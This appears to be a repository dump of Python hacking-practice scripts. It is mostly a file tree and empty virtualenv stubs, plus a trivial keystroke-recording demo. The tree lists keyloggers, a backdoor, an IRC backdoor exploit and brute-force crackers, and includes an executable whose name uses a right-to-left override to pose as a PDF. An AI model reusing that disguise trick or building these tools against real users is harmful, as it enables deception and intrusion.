├── MacChanger ├── venv │ ├── lib64 │ ├── bin │ │ ├── python │ │ ├── python3 │ │ ├── python3.7 │ │ ├── pip │ │ ├── pip3 │ │ ├── pip3.7 │ │ ├── easy_install │ │ └── easy_install-3.7 │ ├── lib │ │ └── python3.7 │ │ │ └── site-packages │ │ │ ├── pip-19.0.3-py3.7.egg │ │ │ ├── EGG-INFO │ │ │ │ ├── not-zip-safe │ │ │ │ ├── top_level.txt │ │ │ │ ├── dependency_links.txt │ │ │ │ └── entry_points.txt │ │ │ └── pip │ │ │ │ ├── _internal │ │ │ │ ├── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── setuptools_build.py │ │ │ │ ├── operations │ │ │ │ │ └── __init__.py │ │ │ │ ├── models │ │ │ │ │ └── __init__.py │ │ │ │ └── cli │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── status_codes.py │ │ │ │ ├── __init__.py │ │ │ │ ├── _vendor │ │ │ │ ├── chardet │ │ │ │ │ ├── cli │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── version.py │ │ │ │ ├── html5lib │ │ │ │ │ ├── filters │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── base.py │ │ │ │ │ │ └── alphabeticalattributes.py │ │ │ │ │ ├── _trie │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── treeadapters │ │ │ │ │ │ └── __init__.py │ │ │ │ ├── urllib3 │ │ │ │ │ ├── contrib │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── _securetransport │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ └── _appengine_environ.py │ │ │ │ │ ├── packages │ │ │ │ │ │ ├── backports │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── ssl_match_hostname │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── util │ │ │ │ │ │ └── queue.py │ │ │ │ ├── msgpack │ │ │ │ │ └── _version.py │ │ │ │ ├── idna │ │ │ │ │ ├── package_data.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── compat.py │ │ │ │ ├── certifi │ │ │ │ │ ├── __main__.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── core.py │ │ │ │ ├── pep517 │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── compat.py │ │ │ │ ├── cachecontrol │ │ │ │ │ ├── caches │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── redis_cache.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── wrapper.py │ │ │ │ │ ├── compat.py │ │ │ │ │ └── cache.py │ │ │ │ ├── pytoml │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── core.py │ │ │ │ ├── distlib │ │ │ │ │ ├── t32.exe │ │ │ │ │ ├── t64.exe │ │ │ │ │ ├── w32.exe │ │ │ │ │ ├── w64.exe │ │ │ │ │ ├── _backport │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── __init__.py │ │ │ │ ├── colorama │ │ │ │ │ └── __init__.py │ │ │ │ ├── requests │ │ │ │ │ ├── __version__.py │ │ │ │ │ ├── certs.py │ │ │ │ │ ├── packages.py │ │ │ │ │ └── hooks.py │ │ │ │ ├── pkg_resources │ │ │ │ │ └── py31compat.py │ │ │ │ └── packaging │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __about__.py │ │ │ │ │ └── _compat.py │ │ │ │ └── __main__.py │ │ │ ├── setuptools.pth │ │ │ ├── easy-install.pth │ │ │ └── setuptools-40.8.0-py3.7.egg │ └── pyvenv.cfg └── .idea │ ├── misc.xml │ ├── inspectionProfiles │ └── profiles_settings.xml │ ├── modules.xml │ └── MacChanger.iml ├── NetworkScanner ├── venv │ ├── lib64 │ ├── bin │ │ ├── python │ │ ├── python3 │ │ ├── python3.7 │ │ ├── pip │ │ ├── pip3 │ │ ├── pip3.7 │ │ ├── scapy │ │ ├── UTscapy │ │ ├── easy_install │ │ └── easy_install-3.7 │ ├── lib │ │ └── python3.7 │ │ │ └── site-packages │ │ │ ├── scapy │ │ │ ├── VERSION │ │ │ ├── arch │ │ │ │ └── bpf │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── consts.py │ │ │ ├── layers │ │ │ │ ├── __init__.py │ │ │ │ ├── tls │ │ │ │ │ └── crypto │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── common.py │ │ │ │ │ │ ├── all.py │ │ │ │ │ │ └── ciphers.py │ │ │ │ ├── gprs.py │ │ │ │ └── all.py │ │ │ ├── tools │ │ │ │ ├── __init__.py │ │ │ │ └── automotive │ │ │ │ │ └── __init__.py │ │ │ ├── contrib │ │ │ │ ├── __init__.py │ │ │ │ ├── automotive │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── bmw │ │ │ │ │ │ └── __init__.py │ │ │ │ │ ├── gm │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── obd │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── iid │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── mid │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── pid │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── tid │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ └── packet.py │ │ │ │ └── scada │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── iec104 │ │ │ │ │ └── __init__.py │ │ │ ├── modules │ │ │ │ └── __init__.py │ │ │ ├── asn1 │ │ │ │ └── __init__.py │ │ │ └── __main__.py │ │ │ ├── scapy-2.4.3-py3.7.egg-info │ │ │ ├── not-zip-safe │ │ │ ├── top_level.txt │ │ │ ├── dependency_links.txt │ │ │ ├── entry_points.txt │ │ │ └── requires.txt │ │ │ ├── pip-19.0.3-py3.7.egg │ │ │ ├── EGG-INFO │ │ │ │ ├── not-zip-safe │ │ │ │ ├── dependency_links.txt │ │ │ │ ├── top_level.txt │ │ │ │ └── entry_points.txt │ │ │ └── pip │ │ │ │ ├── _internal │ │ │ │ ├── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── setuptools_build.py │ │ │ │ ├── operations │ │ │ │ │ └── __init__.py │ │ │ │ ├── models │ │ │ │ │ └── __init__.py │ │ │ │ └── cli │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── status_codes.py │ │ │ │ ├── _vendor │ │ │ │ ├── urllib3 │ │ │ │ │ ├── contrib │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── _securetransport │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ └── _appengine_environ.py │ │ │ │ │ ├── packages │ │ │ │ │ │ ├── backports │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── ssl_match_hostname │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── util │ │ │ │ │ │ └── queue.py │ │ │ │ ├── chardet │ │ │ │ │ ├── cli │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── version.py │ │ │ │ ├── html5lib │ │ │ │ │ ├── filters │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── base.py │ │ │ │ │ │ └── alphabeticalattributes.py │ │ │ │ │ ├── _trie │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── treeadapters │ │ │ │ │ │ └── __init__.py │ │ │ │ ├── msgpack │ │ │ │ │ └── _version.py │ │ │ │ ├── idna │ │ │ │ │ ├── package_data.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── compat.py │ │ │ │ ├── certifi │ │ │ │ │ ├── __main__.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── core.py │ │ │ │ ├── pep517 │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── compat.py │ │ │ │ ├── cachecontrol │ │ │ │ │ ├── caches │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── redis_cache.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── wrapper.py │ │ │ │ │ ├── compat.py │ │ │ │ │ └── cache.py │ │ │ │ ├── pytoml │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── core.py │ │ │ │ ├── distlib │ │ │ │ │ ├── t32.exe │ │ │ │ │ ├── t64.exe │ │ │ │ │ ├── w32.exe │ │ │ │ │ ├── w64.exe │ │ │ │ │ ├── _backport │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── __init__.py │ │ │ │ ├── colorama │ │ │ │ │ └── __init__.py │ │ │ │ ├── requests │ │ │ │ │ ├── __version__.py │ │ │ │ │ ├── certs.py │ │ │ │ │ ├── packages.py │ │ │ │ │ └── hooks.py │ │ │ │ ├── pkg_resources │ │ │ │ │ └── py31compat.py │ │ │ │ └── packaging │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __about__.py │ │ │ │ │ └── _compat.py │ │ │ │ ├── __init__.py │ │ │ │ └── __main__.py │ │ │ ├── setuptools.pth │ │ │ ├── easy-install.pth │ │ │ └── setuptools-40.8.0-py3.7.egg │ └── pyvenv.cfg ├── .idea │ ├── misc.xml │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── modules.xml │ └── NetworkScanner.iml └── NetworkScanner.py ├── tcp_socket_client ├── venv │ ├── lib64 │ ├── lib │ │ └── python3.7 │ │ │ └── site-packages │ │ │ ├── urllib3 │ │ │ ├── contrib │ │ │ │ ├── __init__.py │ │ │ │ ├── _securetransport │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── __pycache__ │ │ │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ │ │ ├── bindings.cpython-37.pyc │ │ │ │ │ │ └── low_level.cpython-37.pyc │ │ │ │ ├── __pycache__ │ │ │ │ │ ├── socks.cpython-37.pyc │ │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ │ ├── appengine.cpython-37.pyc │ │ │ │ │ ├── ntlmpool.cpython-37.pyc │ │ │ │ │ ├── pyopenssl.cpython-37.pyc │ │ │ │ │ ├── securetransport.cpython-37.pyc │ │ │ │ │ └── _appengine_environ.cpython-37.pyc │ │ │ │ └── _appengine_environ.py │ │ │ ├── packages │ │ │ │ ├── backports │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── __pycache__ │ │ │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ │ │ └── makefile.cpython-37.pyc │ │ │ │ ├── __init__.py │ │ │ │ ├── __pycache__ │ │ │ │ │ ├── six.cpython-37.pyc │ │ │ │ │ └── __init__.cpython-37.pyc │ │ │ │ └── ssl_match_hostname │ │ │ │ │ ├── __pycache__ │ │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ │ └── _implementation.cpython-37.pyc │ │ │ │ │ └── __init__.py │ │ │ ├── __pycache__ │ │ │ │ ├── fields.cpython-37.pyc │ │ │ │ ├── request.cpython-37.pyc │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ ├── filepost.cpython-37.pyc │ │ │ │ ├── response.cpython-37.pyc │ │ │ │ ├── _collections.cpython-37.pyc │ │ │ │ ├── connection.cpython-37.pyc │ │ │ │ ├── exceptions.cpython-37.pyc │ │ │ │ ├── poolmanager.cpython-37.pyc │ │ │ │ └── connectionpool.cpython-37.pyc │ │ │ └── util │ │ │ │ ├── __pycache__ │ │ │ │ ├── ssl_.cpython-37.pyc │ │ │ │ ├── url.cpython-37.pyc │ │ │ │ ├── wait.cpython-37.pyc │ │ │ │ ├── queue.cpython-37.pyc │ │ │ │ ├── request.cpython-37.pyc │ │ │ │ ├── retry.cpython-37.pyc │ │ │ │ ├── timeout.cpython-37.pyc │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ ├── response.cpython-37.pyc │ │ │ │ └── connection.cpython-37.pyc │ │ │ │ └── queue.py │ │ │ ├── chardet │ │ │ ├── cli │ │ │ │ ├── __init__.py │ │ │ │ └── __pycache__ │ │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ │ └── chardetect.cpython-37.pyc │ │ │ ├── __pycache__ │ │ │ │ ├── compat.cpython-37.pyc │ │ │ │ ├── enums.cpython-37.pyc │ │ │ │ ├── escsm.cpython-37.pyc │ │ │ │ ├── jisfreq.cpython-37.pyc │ │ │ │ ├── jpcntx.cpython-37.pyc │ │ │ │ ├── mbcssm.cpython-37.pyc │ │ │ │ ├── version.cpython-37.pyc │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ ├── big5freq.cpython-37.pyc │ │ │ │ ├── escprober.cpython-37.pyc │ │ │ │ ├── euckrfreq.cpython-37.pyc │ │ │ │ ├── euctwfreq.cpython-37.pyc │ │ │ │ ├── big5prober.cpython-37.pyc │ │ │ │ ├── cp949prober.cpython-37.pyc │ │ │ │ ├── eucjpprober.cpython-37.pyc │ │ │ │ ├── euckrprober.cpython-37.pyc │ │ │ │ ├── euctwprober.cpython-37.pyc │ │ │ │ ├── gb2312freq.cpython-37.pyc │ │ │ │ ├── gb2312prober.cpython-37.pyc │ │ │ │ ├── hebrewprober.cpython-37.pyc │ │ │ │ ├── latin1prober.cpython-37.pyc │ │ │ │ ├── sjisprober.cpython-37.pyc │ │ │ │ ├── utf8prober.cpython-37.pyc │ │ │ │ ├── charsetprober.cpython-37.pyc │ │ │ │ ├── langgreekmodel.cpython-37.pyc │ │ │ │ ├── langthaimodel.cpython-37.pyc │ │ │ │ ├── chardistribution.cpython-37.pyc │ │ │ │ ├── langcyrillicmodel.cpython-37.pyc │ │ │ │ ├── langhebrewmodel.cpython-37.pyc │ │ │ │ ├── langturkishmodel.cpython-37.pyc │ │ │ │ ├── mbcharsetprober.cpython-37.pyc │ │ │ │ ├── mbcsgroupprober.cpython-37.pyc │ │ │ │ ├── sbcharsetprober.cpython-37.pyc │ │ │ │ ├── sbcsgroupprober.cpython-37.pyc │ │ │ │ ├── universaldetector.cpython-37.pyc │ │ │ │ ├── charsetgroupprober.cpython-37.pyc │ │ │ │ ├── codingstatemachine.cpython-37.pyc │ │ │ │ ├── langbulgarianmodel.cpython-37.pyc │ │ │ │ └── langhungarianmodel.cpython-37.pyc │ │ │ └── version.py │ │ │ ├── idna-2.8.dist-info │ │ │ ├── INSTALLER │ │ │ ├── top_level.txt │ │ │ └── WHEEL │ │ │ ├── chardet-3.0.4.dist-info │ │ │ ├── INSTALLER │ │ │ ├── top_level.txt │ │ │ ├── entry_points.txt │ │ │ └── WHEEL │ │ │ ├── urllib3-1.25.7.dist-info │ │ │ ├── INSTALLER │ │ │ ├── top_level.txt │ │ │ └── WHEEL │ │ │ ├── certifi-2019.11.28.dist-info │ │ │ ├── INSTALLER │ │ │ ├── top_level.txt │ │ │ ├── WHEEL │ │ │ └── metadata.json │ │ │ ├── pip-19.0.3-py3.7.egg │ │ │ ├── EGG-INFO │ │ │ │ ├── not-zip-safe │ │ │ │ ├── top_level.txt │ │ │ │ ├── dependency_links.txt │ │ │ │ └── entry_points.txt │ │ │ └── pip │ │ │ │ ├── _internal │ │ │ │ ├── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── setuptools_build.py │ │ │ │ ├── operations │ │ │ │ │ └── __init__.py │ │ │ │ ├── models │ │ │ │ │ └── __init__.py │ │ │ │ └── cli │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── status_codes.py │ │ │ │ ├── _vendor │ │ │ │ ├── chardet │ │ │ │ │ ├── cli │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── version.py │ │ │ │ ├── html5lib │ │ │ │ │ ├── filters │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── base.py │ │ │ │ │ ├── _trie │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── treeadapters │ │ │ │ │ │ └── __init__.py │ │ │ │ ├── urllib3 │ │ │ │ │ ├── contrib │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── _securetransport │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ └── _appengine_environ.py │ │ │ │ │ ├── packages │ │ │ │ │ │ ├── backports │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── ssl_match_hostname │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── util │ │ │ │ │ │ └── queue.py │ │ │ │ ├── msgpack │ │ │ │ │ └── _version.py │ │ │ │ ├── idna │ │ │ │ │ ├── package_data.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── compat.py │ │ │ │ ├── certifi │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __main__.py │ │ │ │ │ └── core.py │ │ │ │ ├── pep517 │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── compat.py │ │ │ │ ├── cachecontrol │ │ │ │ │ ├── caches │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── redis_cache.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── wrapper.py │ │ │ │ │ ├── compat.py │ │ │ │ │ └── cache.py │ │ │ │ ├── pytoml │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── core.py │ │ │ │ ├── distlib │ │ │ │ │ ├── t32.exe │ │ │ │ │ ├── t64.exe │ │ │ │ │ ├── w32.exe │ │ │ │ │ ├── w64.exe │ │ │ │ │ ├── _backport │ │ │ │ │ │ └── __init__.py │ │ │ │ │ └── __init__.py │ │ │ │ ├── colorama │ │ │ │ │ └── __init__.py │ │ │ │ ├── requests │ │ │ │ │ ├── __version__.py │ │ │ │ │ ├── certs.py │ │ │ │ │ ├── packages.py │ │ │ │ │ └── hooks.py │ │ │ │ ├── pkg_resources │ │ │ │ │ └── py31compat.py │ │ │ │ └── packaging │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __about__.py │ │ │ │ │ └── _compat.py │ │ │ │ ├── __init__.py │ │ │ │ └── __main__.py │ │ │ ├── requests-2.22.0.dist-info │ │ │ ├── INSTALLER │ │ │ ├── top_level.txt │ │ │ ├── WHEEL │ │ │ └── LICENSE │ │ │ ├── idna │ │ │ ├── package_data.py │ │ │ ├── __init__.py │ │ │ ├── __pycache__ │ │ │ │ ├── codec.cpython-37.pyc │ │ │ │ ├── core.cpython-37.pyc │ │ │ │ ├── compat.cpython-37.pyc │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ ├── idnadata.cpython-37.pyc │ │ │ │ ├── intranges.cpython-37.pyc │ │ │ │ ├── uts46data.cpython-37.pyc │ │ │ │ └── package_data.cpython-37.pyc │ │ │ └── compat.py │ │ │ ├── setuptools.pth │ │ │ ├── certifi │ │ │ ├── __main__.py │ │ │ ├── __init__.py │ │ │ ├── __pycache__ │ │ │ │ ├── core.cpython-37.pyc │ │ │ │ ├── __init__.cpython-37.pyc │ │ │ │ └── __main__.cpython-37.pyc │ │ │ └── core.py │ │ │ ├── easy-install.pth │ │ │ ├── setuptools-40.8.0-py3.7.egg │ │ │ └── requests │ │ │ ├── __pycache__ │ │ │ ├── api.cpython-37.pyc │ │ │ ├── auth.cpython-37.pyc │ │ │ ├── certs.cpython-37.pyc │ │ │ ├── compat.cpython-37.pyc │ │ │ ├── help.cpython-37.pyc │ │ │ ├── hooks.cpython-37.pyc │ │ │ ├── models.cpython-37.pyc │ │ │ ├── utils.cpython-37.pyc │ │ │ ├── __init__.cpython-37.pyc │ │ │ ├── adapters.cpython-37.pyc │ │ │ ├── cookies.cpython-37.pyc │ │ │ ├── packages.cpython-37.pyc │ │ │ ├── sessions.cpython-37.pyc │ │ │ ├── __version__.cpython-37.pyc │ │ │ ├── exceptions.cpython-37.pyc │ │ │ ├── structures.cpython-37.pyc │ │ │ ├── status_codes.cpython-37.pyc │ │ │ └── _internal_utils.cpython-37.pyc │ │ │ ├── __version__.py │ │ │ ├── certs.py │ │ │ ├── packages.py │ │ │ └── hooks.py │ ├── pyvenv.cfg │ └── bin │ │ ├── python │ │ ├── python3 │ │ ├── python3.7 │ │ ├── chardetect │ │ ├── pip │ │ ├── pip3 │ │ ├── pip3.7 │ │ ├── easy_install │ │ └── easy_install-3.7 ├── .idea │ ├── dictionaries │ │ └── root.xml │ ├── misc.xml │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── modules.xml │ └── auth.iml └── auth_2.py ├── Keylogger_2 ├── README.md └── keylog.py ├── Package ├── Ceh.pdf ├── pdf.ico ├── pdf.png ├── package‮fdp.exe ├── package.py └── readme.txt ├── SSH_Brute_Forcing └── README.md ├── PortScanner_2 ├── README.md └── portenum.py ├── FileDownloader └── downloader.py ├── Mitm └── .idea │ ├── misc.xml │ ├── inspectionProfiles │ └── profiles_settings.xml │ ├── modules.xml │ └── Mitm.iml ├── KeyLogger ├── .idea │ ├── misc.xml │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── modules.xml │ └── KeyLogger.iml └── key_logger.py ├── BackDoor └── .idea │ ├── misc.xml │ ├── inspectionProfiles │ └── profiles_settings.xml │ ├── modules.xml │ └── SocketListener.iml ├── PacketListener ├── .idea │ ├── misc.xml │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── modules.xml │ └── PacketListener.iml └── packet_listener.py ├── NetworkScanner_2 ├── README.md └── host_scan.py ├── Directory_Enumeration ├── README.md └── direnum.py ├── HashCracker ├── README.md └── hashcrack.py ├── Subdomain_Enumeration ├── README.md └── subdomain_enum.py ├── unreal_irc_backdoor ├── exploit2.py └── exploit.py ├── README.md ├── Zip-Password-Cracker ├── README.md └── zip_crack.py ├── Brute_Force ├── README.md ├── script.py └── script2.py └── base64-multiple-decoder └── README.md /MacChanger/venv/lib64: -------------------------------------------------------------------------------- 1 | lib -------------------------------------------------------------------------------- /NetworkScanner/venv/lib64: -------------------------------------------------------------------------------- 1 | lib -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib64: -------------------------------------------------------------------------------- 1 | lib -------------------------------------------------------------------------------- /MacChanger/venv/bin/python: -------------------------------------------------------------------------------- 1 | python3.7 -------------------------------------------------------------------------------- /MacChanger/venv/bin/python3: -------------------------------------------------------------------------------- 1 | python3.7 -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/python: -------------------------------------------------------------------------------- 1 | python3.7 -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/python3: -------------------------------------------------------------------------------- 1 | python3.7 -------------------------------------------------------------------------------- /MacChanger/venv/bin/python3.7: -------------------------------------------------------------------------------- 1 | /usr/bin/python3.7 -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/python3.7: -------------------------------------------------------------------------------- 1 | /usr/bin/python3.7 -------------------------------------------------------------------------------- /Keylogger_2/README.md: -------------------------------------------------------------------------------- 1 | # Usage: 2 | 3 | `pip3 install keyboard` 4 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/VERSION: -------------------------------------------------------------------------------- 1 | 2.4.3 -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/cli/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna-2.8.dist-info/INSTALLER: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/not-zip-safe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/setuptools.pth: -------------------------------------------------------------------------------- 1 | ./setuptools-40.8.0-py3.7.egg 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy-2.4.3-py3.7.egg-info/not-zip-safe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Package/Ceh.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/Package/Ceh.pdf -------------------------------------------------------------------------------- /Package/pdf.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/Package/pdf.ico -------------------------------------------------------------------------------- /Package/pdf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/Package/pdf.png -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet-3.0.4.dist-info/INSTALLER: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna-2.8.dist-info/top_level.txt: -------------------------------------------------------------------------------- 1 | idna 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3-1.25.7.dist-info/INSTALLER: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/backports/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/top_level.txt: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/utils/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/not-zip-safe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy-2.4.3-py3.7.egg-info/top_level.txt: -------------------------------------------------------------------------------- 1 | scapy 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/setuptools.pth: -------------------------------------------------------------------------------- 1 | ./setuptools-40.8.0-py3.7.egg 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi-2019.11.28.dist-info/INSTALLER: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/not-zip-safe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests-2.22.0.dist-info/INSTALLER: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/dependency_links.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/operations/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/dependency_links.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/top_level.txt: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/utils/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy-2.4.3-py3.7.egg-info/dependency_links.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet-3.0.4.dist-info/top_level.txt: -------------------------------------------------------------------------------- 1 | chardet 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/package_data.py: -------------------------------------------------------------------------------- 1 | __version__ = '2.8' 2 | 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/top_level.txt: -------------------------------------------------------------------------------- 1 | pip 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/utils/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests-2.22.0.dist-info/top_level.txt: -------------------------------------------------------------------------------- 1 | requests 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/setuptools.pth: -------------------------------------------------------------------------------- 1 | ./setuptools-40.8.0-py3.7.egg 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3-1.25.7.dist-info/top_level.txt: -------------------------------------------------------------------------------- 1 | urllib3 2 | -------------------------------------------------------------------------------- /Keylogger_2/keylog.py: -------------------------------------------------------------------------------- 1 | import keyboard 2 | keys = keyboard.record(until ='ENTER') 3 | keyboard.play(keys) 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/__init__.py: -------------------------------------------------------------------------------- 1 | __version__ = "19.0.3" 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/chardet/cli/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 